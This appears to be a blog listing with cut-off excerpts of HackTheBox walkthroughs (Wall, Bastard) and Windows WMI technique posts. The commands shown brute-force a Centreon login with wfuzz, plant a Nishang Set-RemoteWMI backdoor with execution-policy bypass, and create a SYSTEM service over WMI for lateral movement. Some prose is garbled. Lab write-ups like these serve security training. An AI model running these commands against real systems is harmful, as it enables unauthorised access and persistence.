HACKTHEBOX

WALL – (HACKTHEBOX)

root@kali:~/Downloads# nmap -A 10.10.10.157 Now try to access http://10.10.10.157 root@kali:~/Downloads# gobuster dir -u http://10.10.10.157 -w /usr/share/wordlists/dirb/common.txt Now on browser http://10.10.10.157/monitoring Now on terminal root@kali:~/Downloads# curl -X POST http://10.10.10.157/monitoring/ Now on browser try to access http://10.10.10.157/centreon/ root@kali:~/Downloads# wfuzz -c -X POST -d “username=admin&password=FUZZ” -w ./darkweb2017-top10000.txt http://10.10.10.157/centreon/api/index.php?action=authenticate Back to portal Username : admin Password : password1 And […]

WMI

Security Descriptor

This Allow a particular useror group o WMI namesscth sae privilegessa of administrator: PS C:\Users\victim6\Downloads> cd .\new\new\tool\tool\nishang-master\nishang-master\Backdoors\ PS C:\Users\victim6\Downloads\new\new\tool\tool\nishang-master\nishang-master\Backdoors> . .\Set-RemoteWMI.ps1 PS C:\Users\victim6\Downloads\new\new\tool\tool\nishang-master\nishang-master\Backdoors> Set-RemoteWMI -UserName victim6 –verbose PS C:\Users\victim6\Downloads\new\new\tool\tool\nishang-master\nishang-master\Backdoors> Set-RemoteWMI -UserName administrator -ComputerName 192.168.222.144 -Credential SECURITY\administrator –verbose PS C:\Users\victim6\Downloads\new\new\tool\tool\nishang-master\nishang-master\Backdoors> powershell -ep bypass PS C:\Users\victim6\Downloads\new\new\tool\tool\nishang-master\nishang-master\Backdoors> . .\Set-RemoteWMI.ps1 PS C:\Users\victim6\Downloads\new\new\tool\tool\nishang-master\nishang-master\Backdoors> help set-remotewmi –Examples PS C:\Users\victim6\Downloads\new\new\tool\tool\nishang-master\nishang-master\Backdoors> Set-RemoteWMI -UserName […]

HACKTHEBOX

Bastard (HACKTHEBOX)

1) root@kali:~/Downloads# nmap -sC -sV -A 10.10.10.9 Starting Nmap 7.70 ( https://nmap.org ) at 2018-06-09 22:52 EDT Nmap scan report for 10.10.10.9 Host is up (0.16s latency). Not shown: 997 filtered ports PORT STATE SERVICE VERSION 80/tcp open http Microsoft IIS httpd 7.5 |_http-generator: Drupal 7 (http://drupal.org) | http-robots.txt: 36 disallowed entries (15 shown) | […]

Powershell * WMI

Lateral Movement Command Execution Win32_service

PS C:\Users\victim6\Downloads> (Get-CimClass -classname win32_service).cimclassmethods Create a service: PS C:\Users\victim6\Downloads> $servicetype = [byte] 16 PS C:\Users\victim6\Downloads> $ErrorControl = [byte] 1 PS C:\Users\victim6\Downloads> Invoke-WmiMethod -Class win32_service -name create -argumentlist $false, “Windows performance”,$errorcontrol, $null, $null,”WinPerf”,”C:\Windows\Syetm32\calc.exe”, $null, $servicetype, “Manual”, “NT Authority\system”, ” “ PS C:\Users\victim6\Downloads> Get-WmiObject -class win32_service -filter ‘name = “WinPerf”‘ Start the service: PS C:\Users\victim6\Downloads> Get-WmiObject […]